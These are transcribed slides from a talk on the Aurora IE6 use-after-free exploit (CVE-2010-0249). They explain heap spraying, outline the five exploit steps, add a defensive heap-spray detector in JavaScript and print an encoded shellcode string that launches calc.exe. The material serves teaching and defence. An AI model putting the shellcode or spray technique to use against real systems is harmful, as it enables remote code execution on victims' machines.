1 Exploit Analysis Anatomy of Aurora

2 Anatomy of the Talk
- Background
- "Operation Aurora"
- The Heap
- The Heap Spray
- The Vulnerability
- The Exploit
- The Code
- The Debugging
- The Demo
- The End

3-9 Background
- December '09: China hacks Google
  - Adobe vulnerabilities suspected at first
  - Later, IE6 was identified as the culprit
  - Chinese hackers breached an internal auditing tool used by law enforcement agencies to monitor emails, in order to spy on human rights activists and others
- Jan '10: Google attacks China
  - Threatens to stop censoring search results
  - Reveals they hacked China back: black hats ftw!
  - The world goes ape-shit
- Jan 14th: Exploit code released on the net

10-15 "Operation Aurora"
Sophisticated, multitier attack:
1. Possible forgery
2. 0-day IE6 exploit (CVE-2010-0249) *16% browser share
3. Payload downloads and activates malware
4. Remote connection to attacker is established
5. ???
6. Profit

16-20 The Heap
First, a little about memory:
- User applications store dynamic data in the heap
- In Windows, the heap extends until address 0x7fffffff
- As a program uses more memory, the usable heap grows
- The more the usable heap grows, the more space we have to play with...
- How can we exploit this?
[Figure: heap diagram, regions labelled HEAP and USEABLE HEAP, upper bound 0x7fffffff]

21-22 The Heap Spray
Heap spray!
- Fills the heap up with garbage data + shellcode (i.e. "sprays" data at the heap)
- If we can get our program to call or jump somewhere in our injected heap, win!
[Figure: heap diagram with the usable heap filled by INJECTED blocks, one of them marked "jmp here plz kthx"]

23-31 The Vulnerability: CVE-2010-0249
- HTML Object Memory Corruption Vulnerability ("use after free")
- Remote code execution
- Load an object, delete it, inject your code, call the object
- In pictures!
  ∙ Create an object [Figure: USEABLE HEAP with an OBJECT block allocated inside it]
  ∙ Delete object: the memory shouldn't be usable again without being reallocated... but it is! [Figure: the OBJECT block is now marked USEABLE SPACE]

32-37 The Exploit: 5 Steps
1. Create space to overwrite our yet-to-be-created object with
2. Spray the heap with NOPs and our payload
3. Load and dereference an image as our object
4. Inject a pointer to our malicious code (step 2) inside the memory of our "image"
5. Call the "image" again

38 The Code

39-42 The Debugging
We'll load up the exploit with our shell code:

payload = unescape("%uccccSHELLCODE SHELLCODE");

If it works, EIP (the address of the next instruction to be executed) should now point into "SHELLCODE SHELLCODE".
Note: %ucccc == int 3, which is a debugging breakpoint (each 0xCC byte is one int 3 instruction, so %ucccc lays down two of them back to back)
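The heap-spray slides and the debugging note above both hinge on what unescape("%u...") turns into in memory. The following is an added example, not code from the talk: it mirrors the unescape() decoding and the UTF-16 little-endian layout of a JScript string (so "%ucccc" becomes the two bytes CC CC, two int 3 opcodes), and then uses that decoder the way a content filter or sandbox post-processor would, to score a script for spray indicators. It goes slightly beyond the slides by also handling the %XX escape form and single-quoted literals. The function names, the 0.5 sled-ratio threshold, the "x += x" growth heuristic and both sample scripts are my own constructions for illustration.

```javascript
// Added example for this transcript (not code from the talk): decode the
// %u-escaped strings that unescape() consumes into the bytes a browser lays
// out in memory, then score a script for heap-spray indicators the way a
// content filter or sandbox post-processor might. Every sample string below
// is constructed for illustration; thresholds and heuristics are assumptions.

// True when s is a non-empty run of hex digits
function isHex(s) {
  return s.length > 0 && /^[0-9a-fA-F]+$/.test(s);
}

// Mirror unescape() plus the UTF-16LE layout of a JScript string:
//   %uXXXX -> one 16-bit code unit, stored low byte first
//             (%ucccc -> CC CC, two int 3 opcodes; %u4142 -> 42 41)
//   %XX    -> one code unit below 0x100, stored as XX 00
//   other  -> the character's own code unit, stored the same way
function decodeUnicodeEscapes(s) {
  const out = [];
  let i = 0;
  while (i < s.length) {
    let unit;
    const u4 = s.slice(i + 2, i + 6);
    const x2 = s.slice(i + 1, i + 3);
    if (s[i] === "%" && s[i + 1] === "u" && u4.length === 4 && isHex(u4)) {
      unit = parseInt(u4, 16);
      i += 6;
    } else if (s[i] === "%" && x2.length === 2 && isHex(x2)) {
      unit = parseInt(x2, 16);
      i += 3;
    } else {
      unit = s.charCodeAt(i);
      i += 1;
    }
    out.push(unit & 0xff, (unit >> 8) & 0xff);
  }
  return Buffer.from(out);
}

// Bytes that sleds are built from: nop (0x90) and int 3 (0xCC)
const SLED_BYTES = new Set([0x90, 0xcc]);

// Fraction of a decoded buffer made of sled bytes (0 for an empty buffer)
function sledRatio(bytes) {
  if (bytes.length === 0) return 0;
  let n = 0;
  for (const b of bytes) if (SLED_BYTES.has(b)) n += 1;
  return n / bytes.length;
}

// Heuristic scan of one script body:
//   - every unescape("...") / unescape('...') literal, decoded and scored
//   - "x += x" self-doubling assignments, the usual way a small sled is
//     grown until it fills the usable heap
// The verdict is a deliberately simple AND of the two signals (assumed threshold).
function analyzeScript(src) {
  const literalRe = /unescape\(\s*(?:"([^"]*)"|'([^']*)')\s*\)/g;
  const growthRe = /\b([A-Za-z_$][\w$]*)\s*\+=\s*\1\b/g;
  const literals = [];
  let m;
  while ((m = literalRe.exec(src)) !== null) {
    const raw = m[1] !== undefined ? m[1] : m[2];
    const bytes = decodeUnicodeEscapes(raw);
    literals.push({ raw: raw.slice(0, 40), byteLength: bytes.length, sledRatio: sledRatio(bytes) });
  }
  const growthLoops = (src.match(growthRe) || []).length;
  const likelySpray = growthLoops > 0 && literals.some((l) => l.sledRatio >= 0.5);
  return { literals, growthLoops, likelySpray };
}

// Constructed samples: a textbook spray skeleton and a harmless use of unescape()
const SAMPLE_SPRAY = `
var nops = unescape("%u9090%u9090");
while (nops.length < 0x100000) nops += nops;
var payload = unescape("%uccccSHELLCODE SHELLCODE");
var blocks = [];
for (var i = 0; i < 200; i++) blocks[i] = nops + payload;
`;
const SAMPLE_BENIGN = `
document.title = unescape("%u00e9cole");
`;

if (typeof require !== "undefined" && require.main === module) {
  console.log(decodeUnicodeEscapes("%uccccSHELLCODE SHELLCODE").toString("hex"));
  console.log(analyzeScript(SAMPLE_SPRAY));
  console.log(analyzeScript(SAMPLE_BENIGN));
}
```

Run it with node; the first line printed starts with "cccc", which is the pair of int 3 bytes the slide's note refers to, followed by the UTF-16LE bytes of "SHELLCODE SHELLCODE" (each letter padded with a 00, which is why sleds are written as %u escapes rather than plain characters). The spray sample is flagged because its sled literal decodes to 100% nop bytes and is grown with a self-doubling loop; the benign sample decodes to an accented string with no sled bytes and no growth loop, so it is not flagged. The ratio threshold and the loop heuristic are illustrative only and would need tuning against real traffic.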

43-45 The Demo
Inject shellcode to run calc.exe:

payload_calc = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580");

Looks fancy, huh?

46 Questions? The end

47 References
- General
- In depth
- Code
- Presentation (under "Presentations")

